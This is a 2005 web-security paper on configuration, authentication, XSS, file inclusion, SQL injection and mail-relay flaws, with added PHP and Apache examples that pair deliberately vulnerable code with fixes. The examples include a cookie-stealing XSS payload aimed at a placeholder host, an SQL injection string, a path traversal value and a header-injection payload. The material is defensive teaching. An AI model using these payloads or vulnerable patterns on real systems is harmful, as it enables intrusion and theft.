Programming: The Heart of Web Security I

Date July 2, 2005

Many types of security problem can give rise to this type of risk. These include the insertion of JavaScript, PHP or VBScript code into the website (allowing actions unintended by the site designers to be executed against other clients of the site), problems related to authentication (affecting the privacy of site users, with all the legal ramifications one can imagine), and the retrieval of information that should be inaccessible (as a result, for example, of SQL injection).

Flaws that Place the Website Host Server at Risk
These flaws can have the most profound consequences. A hacker who succeeds in taking control of the server that hosts a site has an unlimited field of action: modifying the site, reading any confidential information it holds, and using the server as a base for further illegal actions. Flaws that grant access to all (or many) of the server's files, or that allow commands to be executed on the server, can lead to such consequences very rapidly.

1.3 Potential Application Flaws
The nature of flaws that can be hidden in a web application depends basically on the languages, development techniques and external programs employed on the site. Web applications can quickly become very complex and very diverse, both in terms of functionality and the components deployed. It would be a long, tedious, and ultimately impossible task to attempt to list all of the potential flaws associated with each of the languages and components in use today.

In order to represent current reality as closely as possible, we will focus on analyzing the vulnerability of websites that are based on an architecture in common use today. The analysis and proposed measures presented in the remainder of this paper assume these basic and primary characteristics.

Image: http://www.securitydocs.com/images/papers/WP%20Programming-1.png

1.3.1 Error Searching and Configuration Flaws
Problems with Website Configuration and Structure
Web server configuration problems frequently give rise to other vulnerabilities. An essential first step, then, for even a minimal level of security is to define a configuration that limits the possibilities for external manipulation.

Classic configuration and structural problems include allowing directory listings to be obtained (and, therefore, files that were never meant to be linked to be found and downloaded) and leaving archives, backups and documentation directly reachable on the site.

Certain flaws can allow even more extensive access, to the point that files on the site can be created and deleted.

Poor Authentication Strategy

Problems can arise from a poorly designed authentication system that lets, for example, unregistered persons authenticate as though they were registered users. This is the most common kind of problem, because client passwords can be guessed and because applications may ship with default passwords. In some cases, cookie manipulation can also produce results of this nature: if the application reads the client's identity from a cookie that the client is free to rewrite, no password is needed at all.

A similar, but greater, danger lies in the possibility that, once authenticated, a legitimate but malicious client may be able to make the server believe that it is a different legitimate client (for instance by changing an account identifier in a request), and thereby gain access to information relating to other registered accounts.

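The two weaknesses just described, a client-controlled identity cookie and one authenticated client reading another client's account, in PHP, as an added example that is not part of the original paper. The secret key, the user names and the account data are constructed for illustration:

```php
<?php
// Added example (not from the original paper): cookie manipulation and one
// client posing as another, next to the checks that close them. The key,
// user names and account data below are constructed for illustration.

// Vulnerable: identity is read straight from a cookie. The browser, and so
// the attacker, can set that cookie to any value.
function currentUserVulnerable(array $cookies): ?string
{
    return $cookies['user'] ?? null;
}

// Hardened: the identity cookie carries an HMAC computed with a secret only
// the server knows. The client can read the value but cannot forge one for a
// different user. (A purely server-side session id is the other common design.)
const SERVER_KEY = 'assumption: a long random secret loaded from outside the web root';

function issueIdentityCookie(string $user): string
{
    // MAC first: it is hex, so the first '.' always separates MAC from user.
    return hash_hmac('sha256', $user, SERVER_KEY) . '.' . $user;
}

function currentUserHardened(array $cookies): ?string
{
    $parts = explode('.', $cookies['user'] ?? '', 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$mac, $user] = $parts;
    // hash_equals compares in constant time; a plain == leaks timing information.
    return hash_equals(hash_hmac('sha256', $user, SERVER_KEY), $mac) ? $user : null;
}

// Even with a trustworthy identity, every object the request refers to (here
// an account number) must be checked against the authenticated user.
function viewAccount(?string $user, int $accountId, array $accounts): ?array
{
    if ($user === null || !isset($accounts[$accountId])) {
        return null;
    }
    // This ownership test is what stops a logged-in alice from reading bob's data.
    return $accounts[$accountId]['owner'] === $user ? $accounts[$accountId] : null;
}

$accounts = [                      // constructed sample data
    1001 => ['owner' => 'alice', 'balance' => 120],
    1002 => ['owner' => 'bob',   'balance' => 9500],
];

// bob edits his cookie to claim he is alice.
$forged = ['user' => 'alice'];
var_dump(currentUserVulnerable($forged));   // the vulnerable check believes him
var_dump(currentUserHardened($forged));     // no valid MAC: null

// alice, genuinely logged in, changes the account number in the request.
$alice = currentUserHardened(['user' => issueIdentityCookie('alice')]);
var_dump(viewAccount($alice, 1001, $accounts));   // her own account
var_dump(viewAccount($alice, 1002, $accounts));   // bob's account: null
```

Run with `php cookie_demo.php`. The MAC stops the forged cookie, but it does nothing against the second attack: alice is genuinely who she says she is, and only the ownership test in viewAccount() keeps her out of account 1002. Both checks are needed.
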
1.3.2 Strategies for Attacking Applications
Code Insertion
Code insertion is a major strategy for attacking websites today. The principle is to insert external source code into a database or into other files on the targeted site. In this way, the hacker is able to reprogram a part of the website and cause the site's clients, or the host server itself, to perform actions unintended in the original site design. The consequences of this type of flaw vary a great deal, depending basically on the type of programming language inserted into the site. Within the framework of the reference web server that we have defined, three types of insertion are possible:

* Insertion of JavaScript Code. JavaScript is a language interpreted by the browser of the client accessing an application. Because it runs on the client rather than on the server, it gives the hacker no direct hold on the server, but inserted script runs with the site's own origin in the victim's browser and can read sensitive information such as the client's session cookie or authentication IDs, which could permit the hacker to access the application by appearing to be the client.
* Insertion of PHP Code. PHP is a language interpreted by the server hosting the application. Given that PHP offers nearly unlimited possibilities, an insertion of this type compromises the server completely, and with it the application.
* Insertion of XML Code. XML is used to structure and exchange certain types of data. An XML insertion lets the hacker alter the structure of the data the application reads or displays, and can lead to numerous other illicit activities.

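The JavaScript insertion case above, in the form it usually takes in a PHP page, as an added example that is not part of the original paper. The payload and the collector host (example.invalid) are constructed for illustration:

```php
<?php
// Added example (not from the original paper): a page that echoes client
// input unencoded, next to the output encoding that neutralises the script,
// and the cookie settings that limit the damage if a script does run.
// The payload and the collector host are constructed for illustration.

// Vulnerable: whatever the client sent is placed into the page as-is, so the
// browser of the next visitor who sees this value executes it.
function greetVulnerable(string $name): string
{
    return "<p>Hello, $name</p>";
}

// Hardened: encode for the HTML context at the point of output. ENT_QUOTES
// also covers single quotes, which matters when the value lands inside an
// attribute; ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output.
function greetHardened(string $name): string
{
    return '<p>Hello, ' . htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// A stored-XSS payload that ships the victim's cookies to the attacker's host.
$payload = "<script>new Image().src='http://example.invalid/c?'+document.cookie</script>";

echo "vulnerable: ", greetVulnerable($payload), PHP_EOL;   // the <script> tag survives intact
echo "hardened:   ", greetHardened($payload), PHP_EOL;     // rendered as text: &lt;script&gt;...

// Defence in depth for the session cookie. These must be set before
// session_start(); in a real deployment they belong in php.ini.
ini_set('session.cookie_httponly', '1');   // document.cookie cannot read it
ini_set('session.cookie_secure', '1');     // only sent over HTTPS
ini_set('session.use_only_cookies', '1');  // never accept a session id from the URL
```

Encoding has to match the context: htmlspecialchars() is right for HTML text and attribute values, but a value placed inside a `<script>` block or a URL needs a different encoder. HttpOnly does not prevent the script from running; it only denies it the session identifier, which is the specific theft the text describes.
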
Opening of Files and Execution of Commands
To exploit this kind of flaw, the hacker modifies the arguments of certain PHP functions, typically through request parameters that the script passes to them unchecked, forcing the script to perform actions that the programmer never intended.

The functions affected by this problem are mainly those related to file opening and inclusion, which can be hijacked to give the hacker access to files present on the server hosting the application (files containing script sources, configuration files, logs, password files, etc.).

Moreover, the include statement pulls PHP code from another file into a script. When remote inclusion is enabled (governed by allow_url_fopen in the PHP versions of the time, and by the separate allow_url_include directive from PHP 5.2 onward), the argument may be a URL, so PHP code hosted elsewhere on the Web is fetched and executed on the server. If the hacker controls that argument, the server's security is seriously compromised.

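The include-argument flaw from the two paragraphs above, run against files created in a temporary directory so that it executes offline, as an added example that is not part of the original paper. The page names and directory layout are constructed for illustration:

```php
<?php
// Added example (not from the original paper): a script whose include path is
// chosen by the request, and the allow-list that closes the hole. The page
// names and the temporary directory layout are constructed for illustration.
$base = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir("$base/pages", 0700, true);
file_put_contents("$base/pages/home.php", "<?php echo 'public home page', PHP_EOL;");
file_put_contents("$base/config.php",     "<?php echo 'DB password: s3cret', PHP_EOL;");

// Vulnerable: the request chooses the file. ?page=../config walks out of the
// pages directory; with remote inclusion enabled, ?page=http://host/evil
// would fetch and execute code from the Web instead.
function showPageVulnerable(string $base, string $page): void
{
    include "$base/pages/$page.php";
}

// Hardened: the request selects an entry in a fixed map; no part of the
// filesystem path is ever built from client data.
function showPageHardened(string $base, string $page): bool
{
    $allowed = [
        'home' => "$base/pages/home.php",
    ];
    if (!isset($allowed[$page])) {
        return false;                 // unknown page: refuse rather than guess
    }
    include $allowed[$page];
    return true;
}

$traversal = '../config';
showPageVulnerable($base, 'home');
showPageVulnerable($base, $traversal);            // config.php outside pages/ is executed
showPageHardened($base, 'home');
var_dump(showPageHardened($base, $traversal));    // false: nothing included

// Remove the temporary files.
unlink("$base/pages/home.php");
unlink("$base/config.php");
rmdir("$base/pages");
rmdir($base);
```

Independently of the application code, set `allow_url_include = Off` (and, on PHP older than 5.2, `allow_url_fopen = Off` if the application can live without it) in php.ini so that a forgotten include cannot become remote code execution.
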
SQL Insertion
SQL is the language in which application code queries a database. When a website script performs an SQL query, arguments supplied by the user are inserted into it. The user can try to modify these arguments, reprogramming the SQL query to access data that theoretically is prohibited.

With the widespread use of databases, and above all the ease of designing and integrating them with tools such as PHP and MySQL, this technique has become increasingly widespread and is at the heart of site hacking.

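The SQL-insertion flaw just described, run through PDO against an in-memory SQLite database so that it executes offline, as an added example that is not part of the original paper. The table and rows are constructed for illustration; with MySQL only the DSN would change:

```php
<?php
// Added example (not from the original paper): a login query built by string
// concatenation next to the same query as a prepared statement. The users
// table and its rows are constructed for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)");
$db->exec("INSERT INTO users (name, password) VALUES ('alice', 's3cret'), ('bob', 'hunter2')");

// Vulnerable: the user's input becomes part of the SQL text, so a quote in
// the input ends the string literal and the rest is parsed as SQL.
function loginVulnerable(PDO $db, string $name, string $pass): array
{
    $sql = "SELECT name FROM users WHERE name = '$name' AND password = '$pass'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: the statement is compiled with placeholders and the values are
// bound separately; they can never change the structure of the query.
function loginHardened(PDO $db, string $name, string $pass): array
{
    $stmt = $db->prepare("SELECT name FROM users WHERE name = :name AND password = :pass");
    $stmt->execute([':name' => $name, ':pass' => $pass]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// The classic payload: closes the quoted string and appends an always-true clause.
// The vulnerable query becomes
//   ... WHERE name = '' OR '1'='1' AND password = '' OR '1'='1'
$payload = "' OR '1'='1";
print_r(loginVulnerable($db, $payload, $payload));   // both users, no password known
print_r(loginHardened($db, $payload, $payload));     // empty: no user has that literal name
```

The prepared statement is the fix; escaping with a quoting function is a weaker substitute that fails whenever the value is not inside a quoted string (a numeric id, a column name in ORDER BY). Storing passwords in clear text as the sample table does is a separate flaw: real code stores a hash (password_hash()/password_verify() in PHP) and compares after the lookup.
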
Email Relay
Enabling a web server to send email is a feature that can be turned to malicious purposes. If the user is able to designate the destination address, as is the case with many web applications, he or she can use this functionality to spam (send anonymous promotional email) or to flood a mailbox with messages, a Denial of Service (DoS) attack. The hacker can also use this technique to gain the confidence of other users (by posing as the site administrator, for example), since the mail genuinely originates from the site's server.

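The email relay flaw above, as it appears in a PHP "contact us" form, as an added example that is not part of the original paper. mail() takes its additional headers as a CRLF-separated block, so it cannot distinguish a Bcc: line smuggled in through the visitor's address field from one the programmer wrote. The sample input, the inbox address and the return values standing in for mail() are constructed for illustration:

```php
<?php
// Added example (not from the original paper): header injection through a
// form field, and the validation that prevents it. Instead of calling mail(),
// the functions return what would be passed to it so the effect is visible.
// The input, the inbox address and the body text are constructed for illustration.

// Vulnerable: the visitor's address is pasted straight into the header block,
// and the visitor also chooses the recipient.
function contactVulnerable(string $to, string $from, string $body): array
{
    $headers = "From: $from\r\nReply-To: $from\r\n";
    return ['to' => $to, 'headers' => $headers, 'body' => $body];
}

// Hardened: the destination is fixed server-side, and the visitor's address
// must pass FILTER_VALIDATE_EMAIL, which admits no CR, LF or other control
// characters, so it can never start a new header line.
const CONTACT_INBOX = 'support@example.com';   // assumption: the site's own mailbox

function contactHardened(string $from, string $body): ?array
{
    if (filter_var($from, FILTER_VALIDATE_EMAIL) === false) {
        return null;                            // reject; do not try to "clean" it
    }
    $headers = "From: $from\r\nReply-To: $from\r\n";
    return ['to' => CONTACT_INBOX, 'headers' => $headers, 'body' => $body];
}

// Counts header lines, to make an injected Bcc: visible.
function headerCount(string $headers): int
{
    return preg_match_all('/^[A-Za-z-]+:/m', $headers);
}

// The injected address: a real-looking address followed by a smuggled Bcc:.
$payload = "visitor@example.org\r\nBcc: target1@example.net, target2@example.net";

$v = contactVulnerable('anyone@example.net', $payload, 'buy now');
echo "vulnerable header lines: ", headerCount($v['headers']), PHP_EOL;   // From, Bcc, Reply-To, Bcc
echo $v['headers'];
var_dump(contactHardened($payload, 'buy now'));                  // null: address rejected
var_dump(contactHardened('visitor@example.org', 'hello') !== null);   // a clean address passes
```

Because the address appears twice in the header block, the vulnerable version relays to the two injected targets twice over; the same trick in a Subject: or name field works just as well, so every value that reaches a header needs the same check. Fixing the recipient server-side removes the relay entirely, whatever the validation misses.
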
2 Solutions for Increased Security

Having examined the various security problems that can or do affect applications, let us now consider the techniques and essential precautionary measures that must be taken to guarantee users an optimal level of privacy. This is a holistic response aimed at protecting the interests of the business in several respects:

* Availability of systems and applications
* Protection of critical data and client information
* Confidentiality of application source code

2.1 A Step-by-Step Response
An authentication system, even a very elaborate one, will not provide much protection to user data if it is possible to access the entire base of user accounts because of a structural flaw in the way that the application and the database work together.

Even the slightest details are important. A security problem, even a slight one, can give rise to other flaws that are very serious. It is therefore essential to assure a sufficient level of security across all of the layers and components of the web application.

2.1.1 Web Server Security
Before all else, web server security begins with an examination of the configuration file. The server configuration file delimits the rights of users and defines the manner in which the server functions. It is necessary to find the optimal configuration that allows the application to function without granting rights or enabling supplementary services that it does not need. Add-on modules (which provide functionality supplementary to the server) may have their own configuration files that also need to be optimized.

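A minimal Apache configuration that closes the structural flaws listed in section 1.3.1 (directory listings, directly reachable archives and documentation, per-directory overrides), as an added example that is not part of the original paper. The paths are assumptions, and the `Require` syntax is that of Apache 2.4 (2.2 used `Order deny,allow` / `Deny from all`):

```apache
# Added example (not from the original paper). Paths are assumptions.
<Directory "/var/www/site">
    # No automatic directory listings: a missing index must not reveal file names.
    # No server-side includes or CGI execution from the document tree either.
    Options -Indexes -Includes -ExecCGI
    # Per-directory overrides off, so a stray .htaccess cannot re-enable them.
    AllowOverride None
    Require all granted
</Directory>

# Editor backups, archives, dumps and logs left in the tree must never be served.
<FilesMatch "(\.(bak|old|orig|sql|tar|gz|zip|log|ini)|~)$">
    Require all denied
</FilesMatch>

# Version-control metadata exposes source code and history.
<DirectoryMatch "/\.(git|svn|hg)">
    Require all denied
</DirectoryMatch>

# Application internals that must live under the document root are denied to
# clients; documentation belongs outside it altogether.
<Directory "/var/www/site/includes">
    Require all denied
</Directory>

# Do not advertise the server version in headers and error pages.
ServerTokens Prod
ServerSignature Off
```

After changing the configuration, check it with `apachectl configtest` and then verify from outside: request a directory without an index, a known backup name and an `.git/HEAD` path, and confirm each answers 403 rather than content.
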